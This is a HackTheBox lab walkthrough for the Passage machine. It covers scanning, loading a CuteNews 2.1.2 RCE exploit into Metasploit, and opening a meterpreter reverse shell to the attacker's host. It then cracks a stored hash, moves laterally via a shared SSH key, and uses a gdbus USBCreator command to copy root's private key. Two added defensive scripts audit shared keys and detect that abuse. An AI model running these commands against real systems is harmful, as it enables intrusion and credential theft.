Passage HackTheBox WalkThrough
This is the Passage HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Passage HTB machine. Before starting, some facts about this machine: it is a Linux box with IP address 10.10.10.206, rated medium difficulty by its maker.
First of all, connect your local machine to the VPN so that you can reach the lab machines, and confirm connectivity to the Passage machine by pinging the IP address 10.10.10.206. If everything is in order, start hacking.
As usual, I began by scanning the IP address to get some starting points. I used nmap for this task; the result is below.
Scanning
$ nmap -sC -sV -oN passage_scan 10.10.10.206
Nmap revealed that ports 22 and 80 are open: an SSH server is running on port 22 and an Apache2 web server on port 80. Since Apache is listening on port 80, there must be a website hosted on this IP. Browsing to http://10.10.10.206/ showed a webpage titled Passage News.
Scrolling to the bottom of the page gave the footer Powered by: CuteNews. I immediately googled CuteNews and found that it is an open-source Content Management System (CMS) for hosting news articles. Since it is a CMS, there must be some user(s) who write posts on this website. After some time I found two email addresses, [email protected] and [email protected].
So we have two users, paul and nadav, extracted from their emails. I added them to my notes and proceeded with further enumeration. Checking the page source (CTRL+U) revealed the URL http://10.10.10.206/CuteNews, which is the installation folder of CuteNews. Visiting this page showed register and login options, and the version of CuteNews in use is 2.1.2.
Whenever I learn the name and version of a piece of software or CMS, I immediately search for public exploits for it. So I used searchsploit [a CLI tool to query the exploit-db database] to search for exploits for CuteNews 2.1.2.
Searching Public Exploit
$ searchsploit CuteNews 2.1.2
There is a Remote Code Execution exploit for CuteNews 2.1.2, and it also has a Metasploit module. So I launched Metasploit to exploit this vulnerability. But searching for CuteNews in Metasploit returned the message No results found from search.
Since this module is not present in metasploit-framework, we have to download the exploit and add it explicitly. The exploit link is https://www.exploit-db.com/download/46698. I followed the steps below to integrate the module into Metasploit.
$ msfdb run
msf5 > search cutenews
msf5 > wget 'https://www.exploit-db.com/download/46698'
msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
We have to add a comma [,] to this exploit because it contains a syntax error; see this issue in the rapid7 repo.
msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
After adding the exploit and making the change, we have to reload all modules.
msf5 > reload_all
msf5 > search cutenews
Now we have successfully added the CuteNews RCE exploit to our metasploit-framework. After loading the CuteNews module, the msf command show options, which lists the available options, showed that it also takes USERNAME and PASSWORD. So CuteNews 2.1.2 actually has an Authenticated RCE vulnerability, because it requires a username and password too. As we already have a register button at http://10.10.10.206/CuteNews, I registered a user with the name test1 and password test1.
It is time to get a meterpreter shell. I used the above credentials to get it.
Getting Shell
msf5 > use exploit/unix/webapp/cutenews_avatar_rce
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit
meterpreter > sysinfo
Note: If your meterpreter shell doesn't work, background the shell and run the exploit again; it may take 3-4 attempts. If it still doesn't work, use the unstaged payload php/meterpreter_reverse_tcp instead of the staged payload.
Got a meterpreter shell. I upgraded it to a fully interactive Linux shell so that I could run all Linux commands remotely.
Upgrading Shell
meterpreter > shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ CTRL+Z           // to background the shell
$ stty raw -echo
$ fg               // then press Enter twice to foreground the session
After some enumeration I found a file named lines inside the directory /var/www/html/CuteNews/cdata/users/. It contains the information of all users in base64-encoded form. After decoding it, I found the SHA256 hash of user paul.
$ cat /var/www/html/CuteNews/cdata/users/lines
paul : e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
Luckily, Crackstation had the password for this hash. So we have the credentials paul : atlanta1. I switched user to paul using the password atlanta1.
$ su paul
Password: atlanta1
Capture User Flag
$ cat user.txt
Privilege Escalation
After some initial enumeration I found that the authorized_keys file of user paul contains the key of user nadav. This means user paul can connect to user nadav locally via SSH.
$ ssh nadav@localhost
Successfully logged in as nadav through SSH. We are nadav now.
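From the defender's side, the lateral move above is easy to spot in advance: a key that unlocks more than one account, or a key whose comment names a different user than the account it sits in. The following audit script is an added example, not part of the original writeup; the fake_ed25519_blob helper and the SAMPLE dictionary are constructed data standing in for real authorized_keys files.

```python
import base64
import hashlib
from collections import defaultdict
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")

def parse_key(line):
    """Return (OpenSSH-style SHA256 fingerprint, comment) for one authorized_keys
    line; leading options such as no-pty are skipped, comments may be empty."""
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok.startswith(KEY_TYPES) and i + 1 < len(parts):
            digest = hashlib.sha256(base64.b64decode(parts[i + 1])).digest()
            fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
            return fp, " ".join(parts[i + 2:])
    raise ValueError("no key material in line: %r" % line)

def find_shared_keys(auth_files):
    """auth_files: {account: contents of that account's authorized_keys}.
    Returns [(fingerprint, sorted accounts, comment)] for each key that unlocks
    more than one account or whose comment names a user other than that account."""
    seen = defaultdict(list)  # fingerprint -> [(account, comment)]
    for account, text in auth_files.items():
        for line in text.splitlines():
            line = line.strip()
            if line and not line.startswith("#"):
                fp, comment = parse_key(line)
                seen[fp].append((account, comment))
    findings = []
    for fp, uses in seen.items():
        accounts = sorted({a for a, _ in uses})
        comment = uses[0][1]
        named = comment.split("@")[0] if comment else None
        if len(accounts) > 1 or (named and named not in accounts):
            findings.append((fp, accounts, comment))
    return findings

# Constructed sample: the 32 'public key' bytes are a hash of a seed, not real keys.
def fake_ed25519_blob(seed):
    pub = hashlib.sha256(seed).digest()
    return base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + pub).decode()
SAMPLE = {
    "paul":  "ssh-ed25519 %s nadav@passage\n" % fake_ed25519_blob(b"shared"),
    "nadav": "# nadav's own key\nssh-ed25519 %s nadav@passage\n" % fake_ed25519_blob(b"shared"),
    "root":  "ssh-ed25519 %s root@passage\n" % fake_ed25519_blob(b"root-only"),
}

if __name__ == "__main__":
    for fp, accounts, comment in find_shared_keys(SAMPLE):
        print("%s unlocks %s (comment: %s)" % (fp, ", ".join(accounts), comment))
```

On a real host, feed it the contents of each /home/*/.ssh/authorized_keys and /root/.ssh/authorized_keys; one finding per fingerprint keeps the report short even when a key is reused widely.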
After some more enumeration I did not find any privilege escalation vector, so I ran linpeas.sh [a post-exploitation enumeration script] for help, and it reported that gdbus could be used to escalate privileges. I did not know how to escalate privileges using gdbus, so I googled privilege escalation using gdbus and took the first article.
According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompt. In other words, any user can copy the contents of root's files without a password. So I used the following command to copy the root user's id_rsa key, so that with this key I could SSH in as root.
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true
$ cat /tmp/key.txt
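From a detection standpoint, the USBCreator Image method has a narrow legitimate shape (read an image file, write it to a block device), so a call that reads from /root or writes to /tmp stands out on the system bus. The script below is an added example, not part of the writeup: it parses lines in the shape of dbus-monitor --system output and flags Image calls that read a sensitive tree or write anywhere other than a device node; the SAMPLE_MONITOR lines and the SENSITIVE_SOURCES list are constructed assumptions.

```python
import re
# Assumption for this example: a legitimate image write never reads from these trees.
SENSITIVE_SOURCES = ("/root/", "/etc/", "/var/")
HEADER = re.compile(r"^method call .*?sender=(?P<sender>\S+) .*?interface=(?P<iface>[^;]+); member=(?P<member>\S+)")
ARG = re.compile(r'^\s+(string|boolean)\s+"?(?P<val>[^"]*)"?\s*$')

def parse_calls(text):
    """Group dbus-monitor output into method calls with their argument values."""
    calls, current = [], None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = {"sender": m["sender"], "iface": m["iface"], "member": m["member"], "args": []}
            calls.append(current)
        elif current is not None and ARG.match(line):
            current["args"].append(ARG.match(line)["val"])
    return calls

def suspicious_image_calls(text):
    """(sender, source, destination, reasons) for each USBCreator.Image call that
    reads a sensitive path or writes somewhere other than a device node."""
    findings = []
    for c in parse_calls(text):
        if (c["iface"], c["member"]) != ("com.ubuntu.USBCreator", "Image") or len(c["args"]) < 2:
            continue
        src, dst, reasons = c["args"][0], c["args"][1], []
        if src.startswith(SENSITIVE_SOURCES):
            reasons.append("source in sensitive directory")
        if not dst.startswith("/dev/"):
            reasons.append("destination is not a block device")
        if reasons:
            findings.append((c["sender"], src, dst, reasons))
    return findings

# Constructed sample in the shape of `dbus-monitor --system` output: a legitimate ISO
# write to /dev/sdb, then the copy of root's key to /tmp described above.
SAMPLE_MONITOR = """\
method call time=1600000000.100 sender=:1.88 -> destination=com.ubuntu.USBCreator serial=3 path=/com/ubuntu/USBCreator; interface=com.ubuntu.USBCreator; member=Image
   string "/home/nadav/ubuntu.iso"
   string "/dev/sdb"
   boolean true
method call time=1600000000.200 sender=:1.91 -> destination=com.ubuntu.USBCreator serial=4 path=/com/ubuntu/USBCreator; interface=com.ubuntu.USBCreator; member=Image
   string "/root/.ssh/id_rsa"
   string "/tmp/key.txt"
   boolean true
"""

if __name__ == "__main__":
    for sender, src, dst, why in suspicious_image_calls(SAMPLE_MONITOR):
        print("ALERT %s Image(%s -> %s): %s" % (sender, src, dst, "; ".join(why)))
```

The lasting fix is to patch or remove usb-creator so that the service no longer accepts arbitrary source and destination paths from unprivileged callers; the monitor only tells you when the hole is being used.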
We have got the private key of user root. I copied this key into a file named root_key on my local PC, changed the file's permissions to 600, and connected as root using SSH.
$ vi root_key
$ chmod 600 root_key
$ ssh -i root_key [email protected]
root@passage:~# whoami && id
We have successfully escalated privileges to root. Now we can capture the root flag.
Capture Root Flag
$ cat root.txt
This is how I rooted Passage on HackTheBox. I learnt a lot while hunting this box and hope you have also learnt something new from it. Thanks for reading this writeup. For any suggestions or queries related to the walkthrough, feel free to contact us at [email protected].
You can read walkthroughs of similar machines here.